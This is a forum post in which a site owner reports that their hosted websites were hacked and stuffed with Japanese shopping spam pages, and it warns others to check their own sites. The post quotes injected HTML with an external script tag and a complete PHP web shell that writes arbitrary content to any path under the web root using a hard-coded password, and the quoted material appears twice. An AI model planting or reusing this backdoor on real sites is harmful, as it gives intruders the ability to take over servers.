BluJag
Perch
All my sites on Web4 have been hacked by a Japanese shopping organisation. I'm in the long process of trying to delete the thousands and thousands of files which have been uploaded
This is a snippet from one of the html files
<script type="text/javascript" src="http://iclothesshow.top/js/clotho.js"></script>shop/item/3390.html"
and
<dd><a href="http://www.mungaz.net/engine/eX0-Spring-short-coat-U7.html">Mila Owen 無地衿付きニットトップス ミラオーウェン</a></dd>
and
<div class=copyright>
<div class=inner>
<div class=policy> <a href="http://www.orbis.co.jp/contents/company/privacy/">個人情報保護方針</a><span>|</span><a href="/snspolicy/">ソーシャルメディアポリシー</a> </div>
<p> <img src="http://www.orbis.co.jp/contents/images/foot/2015copyright.png" alt="copyright © 1999-2015 orbis inc. all rights reserved." width=266 height=11><img src="http://www.orbis.co.jp/contents/images/foot/footer_logo.gif" alt=orbis width=43 height=16 class=footlogo><br>
</p>
</div>
</div>
Plus there are php files too, eg
$config_password="yt";
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);
if($password==""||$filename==""||$body=="")
{
echo 'parameters error!';
return;
}
if($password!=$config_password)
{
echo 'password error!';
return;
}
$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;
if($folderpath!="")
{
if($folderpath=="root")
{
$newPath=$rootPath.'/'.$filename;
}
else
{
createFolder($rootPath.'/'.$folderpath);
$newPath=$rootPath.'/'.$folderpath.'/'.$filename;
}
}
else
{
$newPath=$filename;
}
$fp=fopen($newPath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);
if(file_exists($newPath))
{
echo "publish success & uploaded";
}
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);
}
}
Suggest everyone checks their own sites!
This is a snippet from one of the html files
<script type="text/javascript" src="http://iclothesshow.top/js/clotho.js"></script>shop/item/3390.html"
and
<dd><a href="http://www.mungaz.net/engine/eX0-Spring-short-coat-U7.html">Mila Owen 無地衿付きニットトップス ミラオーウェン</a></dd>
and
<div class=copyright>
<div class=inner>
<div class=policy> <a href="http://www.orbis.co.jp/contents/company/privacy/">個人情報保護方針</a><span>|</span><a href="/snspolicy/">ソーシャルメディアポリシー</a> </div>
<p> <img src="http://www.orbis.co.jp/contents/images/foot/2015copyright.png" alt="copyright © 1999-2015 orbis inc. all rights reserved." width=266 height=11><img src="http://www.orbis.co.jp/contents/images/foot/footer_logo.gif" alt=orbis width=43 height=16 class=footlogo><br>
</p>
</div>
</div>
Plus there are php files too, eg
$config_password="yt";
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);
if($password==""||$filename==""||$body=="")
{
echo 'parameters error!';
return;
}
if($password!=$config_password)
{
echo 'password error!';
return;
}
$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;
if($folderpath!="")
{
if($folderpath=="root")
{
$newPath=$rootPath.'/'.$filename;
}
else
{
createFolder($rootPath.'/'.$folderpath);
$newPath=$rootPath.'/'.$folderpath.'/'.$filename;
}
}
else
{
$newPath=$filename;
}
$fp=fopen($newPath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);
if(file_exists($newPath))
{
echo "publish success & uploaded";
}
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);
}
}
Suggest everyone checks their own sites!
Last edited:
